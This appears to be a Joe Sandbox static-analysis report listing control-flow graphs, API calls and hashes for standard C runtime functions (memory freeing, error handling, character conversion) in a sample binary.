                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2597970681-0
                                                                                                                                                                                                  • Opcode ID: 7b0b33874d492ca83d7c10610a5137dcd4602ba6bdb0021bc6e11124a315d969
                                                                                                                                                                                                  • Instruction ID: 57534c316125af52f854efd362d9ff29cabad24499ab4271772670dc95f77aab
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b0b33874d492ca83d7c10610a5137dcd4602ba6bdb0021bc6e11124a315d969
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9051D472E54217ABDB259FA4CC41FBBB7AAEB84750F15462CFC04D6240EB34DC40DA52

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  control_flow_graph 230 9c8417-9c8474 GetConsoleCP 231 9c847a-9c8496 230->231 232 9c85b7-9c85c9 call 9c123a 230->232 234 9c8498-9c84af 231->234 235 9c84b1-9c84c2 call 9c6052 231->235 237 9c84eb-9c84fa call 9c72b7 234->237 242 9c84e8-9c84ea 235->242 243 9c84c4-9c84c7 235->243 237->232 244 9c8500-9c8520 WideCharToMultiByte 237->244 242->237 245 9c84cd-9c84df call 9c72b7 243->245 246 9c858e-9c85ad 243->246 244->232 247 9c8526-9c853c WriteFile 244->247 245->232 252 9c84e5-9c84e6 245->252 246->232 250 9c853e-9c854f 247->250 251 9c85af-9c85b5 GetLastError 247->251 250->232 253 9c8551-9c8555 250->253 251->232 252->244 254 9c8557-9c8575 WriteFile 253->254 255 9c8583-9c8586 253->255 254->251 256 9c8577-9c857b 254->256 255->231 257 9c858c 255->257 256->232 258 9c857d-9c8580 256->258 257->232 258->255
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,009C8B8C,?,00000000,?,00000000,00000000), ref: 009C8459
                                                                                                                                                                                                  • __fassign.LIBCMT ref: 009C84D4
                                                                                                                                                                                                  • __fassign.LIBCMT ref: 009C84EF
                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 009C8515
                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,009C8B8C,00000000,?,?,?,?,?,?,?,?,?,009C8B8C,?), ref: 009C8534
                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,009C8B8C,00000000,?,?,?,?,?,?,?,?,?,009C8B8C,?), ref: 009C856D
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1324828854-0
                                                                                                                                                                                                  • Opcode ID: d41790aa8cc5b2ba56d882c43f0352d5339904652aec1662bf8828a1437f4cae
                                                                                                                                                                                                  • Instruction ID: 3d25b6614462068eb73152c22ae4af359aebec023eb9d5e7717d819fa7565aef
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d41790aa8cc5b2ba56d882c43f0352d5339904652aec1662bf8828a1437f4cae
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 24518D71E00249AFDB10CFA8D885FEEBBB8EF19300F14455AE955E7291DB709A41CB62

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  control_flow_graph 259 9c1e00-9c1e51 call 9cac80 call 9c1dc0 call 9c2377 266 9c1ead-9c1eb0 259->266 267 9c1e53-9c1e65 259->267 268 9c1ed0-9c1ed9 266->268 269 9c1eb2-9c1ebf call 9c2360 266->269 267->268 270 9c1e67-9c1e7e 267->270 275 9c1ec4-9c1ecd call 9c1dc0 269->275 272 9c1e94 270->272 273 9c1e80-9c1e8e call 9c2300 270->273 274 9c1e97-9c1e9c 272->274 280 9c1ea4-9c1eab 273->280 281 9c1e90 273->281 274->270 278 9c1e9e-9c1ea0 274->278 275->268 278->268 282 9c1ea2 278->282 280->275 284 9c1eda-9c1ee3 281->284 285 9c1e92 281->285 282->275 286 9c1f1d-9c1f2d call 9c2340 284->286 287 9c1ee5-9c1eec 284->287 285->274 293 9c1f2f-9c1f3e call 9c2360 286->293 294 9c1f41-9c1f5d call 9c1dc0 call 9c2320 286->294 287->286 288 9c1eee-9c1efd call 9caac0 287->288 296 9c1eff-9c1f17 288->296 297 9c1f1a 288->297 293->294 296->297 297->286
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 009C1E37
                                                                                                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 009C1E3F
                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 009C1EC8
                                                                                                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 009C1EF3
                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 009C1F48
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                  • API String ID: 1170836740-1018135373

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  control_flow_graph 305 9c621b-9c6226 306 9c62fc-9c62fe 305->306 307 9c622c-9c62f9 call 9c61df * 5 call 9c4869 * 3 call 9c61df * 5 call 9c4869 * 4 305->307 307->306
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 009C61DF: _free.LIBCMT ref: 009C6208
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C6269
                                                                                                                                                                                                    • Part of subcall function 009C4869: HeapFree.KERNEL32(00000000,00000000,?,009C620D,?,00000000,?,00000000,?,009C6234,?,00000007,?,?,009C669F,?), ref: 009C487F
                                                                                                                                                                                                    • Part of subcall function 009C4869: GetLastError.KERNEL32(?,?,009C620D,?,00000000,?,00000000,?,009C6234,?,00000007,?,?,009C669F,?,?), ref: 009C4891
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C6274
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C627F
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C62D3
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C62DE
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C62E9
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C62F4
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 776569668-0

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  control_flow_graph 342 9c23d1-9c23d8 343 9c23dd-9c23f8 GetLastError call 9c26a4 342->343 344 9c23da-9c23dc 342->344 347 9c23fa-9c23fc 343->347 348 9c2411-9c2413 343->348 349 9c23fe-9c240f call 9c26df 347->349 350 9c2457-9c2462 SetLastError 347->350 348->350 349->348 353 9c2415-9c2425 call 9c3f67 349->353 356 9c2439-9c2449 call 9c26df 353->356 357 9c2427-9c2437 call 9c26df 353->357 362 9c244f-9c2456 call 9c3ec5 356->362 357->356 363 9c244b-9c244d 357->363 362->350 363->362
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,009C23C8,009C209F,009C1AFC), ref: 009C23DF
                                                                                                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 009C23ED
                                                                                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 009C2406
                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,009C23C8,009C209F,009C1AFC), ref: 009C2458
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3852720340-0

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  control_flow_graph 366 9c4424-9c4438 GetLastError 367 9c443a-9c4444 call 9c5904 366->367 368 9c4446-9c444b 366->368 367->368 375 9c448f-9c449a SetLastError 367->375 370 9c444d call 9c480c 368->370 372 9c4452-9c4458 370->372 373 9c445a 372->373 374 9c4463-9c4471 call 9c595a 372->374 376 9c445b-9c4461 call 9c4869 373->376 381 9c4476-9c448d call 9c4296 call 9c4869 374->381 382 9c4473-9c4474 374->382 383 9c449b-9c44a7 SetLastError call 9c3f24 376->383 381->375 381->383 382->376
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetLastError.KERNEL32(00000008,?,009C6D69,?,?,?,009D04C8,0000002C,009C3F34,00000016,009C209F,009C1AFC), ref: 009C4428
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C445B
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C4483
                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 009C4490
                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 009C449C
                                                                                                                                                                                                  • _abort.LIBCMT ref: 009C44A2
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3160817290-0

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  control_flow_graph 390 9c36fc-9c3724 GetModuleHandleExW 391 9c3749-9c374d 390->391 392 9c3726-9c3739 GetProcAddress 390->392 393 9c374f-9c3752 FreeLibrary 391->393 394 9c3758-9c3765 call 9c123a 391->394 395 9c3748 392->395 396 9c373b-9c3746 392->396 393->394 395->391 396->395
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,009C36AD,?,?,009C364D,?,009D02E0,0000000C,009C37A4,?,00000002), ref: 009C371C
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 009C372F
                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,009C36AD,?,?,009C364D,?,009D02E0,0000000C,009C37A4,?,00000002,00000000), ref: 009C3752
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                  • API String ID: 4061214504-1276376045

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  control_flow_graph 400 9c634d-9c6372 call 9c3f72 403 9c637f-9c63a5 MultiByteToWideChar 400->403 404 9c6374-9c637c 400->404 405 9c63ab-9c63b7 403->405 406 9c6444-9c6448 403->406 404->403 407 9c63b9-9c63ca 405->407 408 9c6403 405->408 409 9c644a-9c644d 406->409 410 9c6454-9c6469 call 9c123a 406->410 412 9c63cc-9c63db call 9cac20 407->412 413 9c63e5-9c63eb 407->413 411 9c6405-9c6407 408->411 409->410 415 9c643d-9c6443 call 9c646a 411->415 416 9c6409-9c642b call 9c20b0 MultiByteToWideChar 411->416 412->415 426 9c63dd-9c63e3 412->426 418 9c63ec call 9c62ff 413->418 415->406 416->415 428 9c642d-9c643b GetStringTypeW 416->428 423 9c63f1-9c63f6 418->423 423->415 427 9c63f8 423->427 429 9c63fe-9c6401 426->429 427->429 428->415 429->411
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,009C54C8,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 009C639A
                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 009C63D2
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 009C6423
                                                                                                                                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 009C6435
                                                                                                                                                                                                  • __freea.LIBCMT ref: 009C643E
                                                                                                                                                                                                    • Part of subcall function 009C62FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,009C7E5B,?,00000000,?,009C686F,?,00000004,00000000,?,?,?,009C3BCD), ref: 009C6331
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1857427562-0
                                                                                                                                                                                                  • Opcode ID: 49685a6e7199083c956885788f5bf1876ff32464be6105500993e7bb9f9946af
                                                                                                                                                                                                  • Instruction ID: 5cf8921b07982f42ea35fa03f82b3dc48f081f9906834046b234ccc74e284fed
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 49685a6e7199083c956885788f5bf1876ff32464be6105500993e7bb9f9946af
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0231AE72E0021AABDB299F64DC45FAE7BA9EF44310F04412DFC14D61A0E735CD51CBA2

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  control_flow_graph 430 9c561e-9c5633 GetEnvironmentStringsW 431 9c568b 430->431 432 9c5635-9c5655 call 9c55e7 WideCharToMultiByte 430->432 434 9c568d-9c568f 431->434 432->431 438 9c5657 432->438 436 9c5698-9c56a0 434->436 437 9c5691-9c5692 FreeEnvironmentStringsW 434->437 437->436 439 9c5658 call 9c62ff 438->439 440 9c565d-9c5662 439->440 441 9c5664-9c5678 WideCharToMultiByte 440->441 442 9c5680 440->442 441->442 443 9c567a-9c567e 441->443 444 9c5682-9c5689 call 9c4869 442->444 443->444 444->434
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 009C5627
                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009C564A
                                                                                                                                                                                                    • Part of subcall function 009C62FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,009C7E5B,?,00000000,?,009C686F,?,00000004,00000000,?,?,?,009C3BCD), ref: 009C6331
                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 009C5670
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C5683
                                                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 009C5692
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2278895681-0
                                                                                                                                                                                                  • Opcode ID: a8a7dfcbc6312f3fdb8baf8c988a9cde2a3acfa73019cc2f7bc1ee93d55730f9
                                                                                                                                                                                                  • Instruction ID: a1bc1788f271df9592a61629564f482fb4ca7fee390c88824446a7728ede4849
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a8a7dfcbc6312f3fdb8baf8c988a9cde2a3acfa73019cc2f7bc1ee93d55730f9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8C01F772E05A557F27215ABA5D4DE7B7A6DDEC2BA4357012DF904C3100EB609C0192B2

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  control_flow_graph 447 9c44a8-9c44bf GetLastError 448 9c44cd-9c44d2 447->448 449 9c44c1-9c44cb call 9c5904 447->449 451 9c44d4 call 9c480c 448->451 449->448 454 9c451e-9c4525 SetLastError 449->454 453 9c44d9-9c44df 451->453 455 9c44ea-9c44f8 call 9c595a 453->455 456 9c44e1 453->456 457 9c4527-9c452c 454->457 462 9c44fd-9c4513 call 9c4296 call 9c4869 455->462 463 9c44fa-9c44fb 455->463 458 9c44e2-9c44e8 call 9c4869 456->458 466 9c4515-9c451c SetLastError 458->466 462->454 462->466 463->458 466->457
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,009C47FE,009C7E79,?,009C686F,?,00000004,00000000,?,?,?,009C3BCD,?,00000000), ref: 009C44AD
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C44E2
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C4509
                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 009C4516
                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 009C451F
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast$_free
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3170660625-0
                                                                                                                                                                                                  • Opcode ID: deb5d85dbfd9d086fa8f29f04105666499a754572211dcd23d5391565242dc00
                                                                                                                                                                                                  • Instruction ID: b31a37c162e21b7ef68b455ef32e37aea45167b94d122c3b53a423b6b6a530bd
                                                                                                                                                                                                  • Opcode Fuzzy Hash: deb5d85dbfd9d086fa8f29f04105666499a754572211dcd23d5391565242dc00
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C501F476F55640AB8226BB746C66F2B326EABD13B1B35412DF829E2192EF348D015123

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  control_flow_graph 470 9c6176-9c6181 471 9c61dc-9c61de 470->471 472 9c6183-9c618b 470->472 473 9c618d-9c6193 call 9c4869 472->473 474 9c6194-9c619d 472->474 473->474 475 9c619f-9c61a5 call 9c4869 474->475 476 9c61a6-9c61af 474->476 475->476 479 9c61b8-9c61c1 476->479 480 9c61b1-9c61b7 call 9c4869 476->480 484 9c61ca-9c61d3 479->484 485 9c61c3-9c61c9 call 9c4869 479->485 480->479 484->471 488 9c61d5-9c61db call 9c4869 484->488 485->484 488->471
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C618E
                                                                                                                                                                                                    • Part of subcall function 009C4869: HeapFree.KERNEL32(00000000,00000000,?,009C620D,?,00000000,?,00000000,?,009C6234,?,00000007,?,?,009C669F,?), ref: 009C487F
                                                                                                                                                                                                    • Part of subcall function 009C4869: GetLastError.KERNEL32(?,?,009C620D,?,00000000,?,00000000,?,009C6234,?,00000007,?,?,009C669F,?,?), ref: 009C4891
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C61A0
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C61B2
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C61C4
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C61D6
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                  • Opcode ID: 8a6188d19d29888b1a880594ed3abbb819f0df5f9a1a7e8512012c250f1cfa59
                                                                                                                                                                                                  • Instruction ID: 211baf5440b235a0af17f4f4d205bfdcefa65b53b5511614fc02001e824bbabb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8a6188d19d29888b1a880594ed3abbb819f0df5f9a1a7e8512012c250f1cfa59
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9CF04F33F59200BF8660EF55F991E5A77EDAA80B5139C080EF409DB592C620FC808752
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C3DAD
                                                                                                                                                                                                    • Part of subcall function 009C4869: HeapFree.KERNEL32(00000000,00000000,?,009C620D,?,00000000,?,00000000,?,009C6234,?,00000007,?,?,009C669F,?), ref: 009C487F
                                                                                                                                                                                                    • Part of subcall function 009C4869: GetLastError.KERNEL32(?,?,009C620D,?,00000000,?,00000000,?,009C6234,?,00000007,?,?,009C669F,?,?), ref: 009C4891
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C3DBF
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C3DD2
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C3DE3
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C3DF4
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 776569668-0
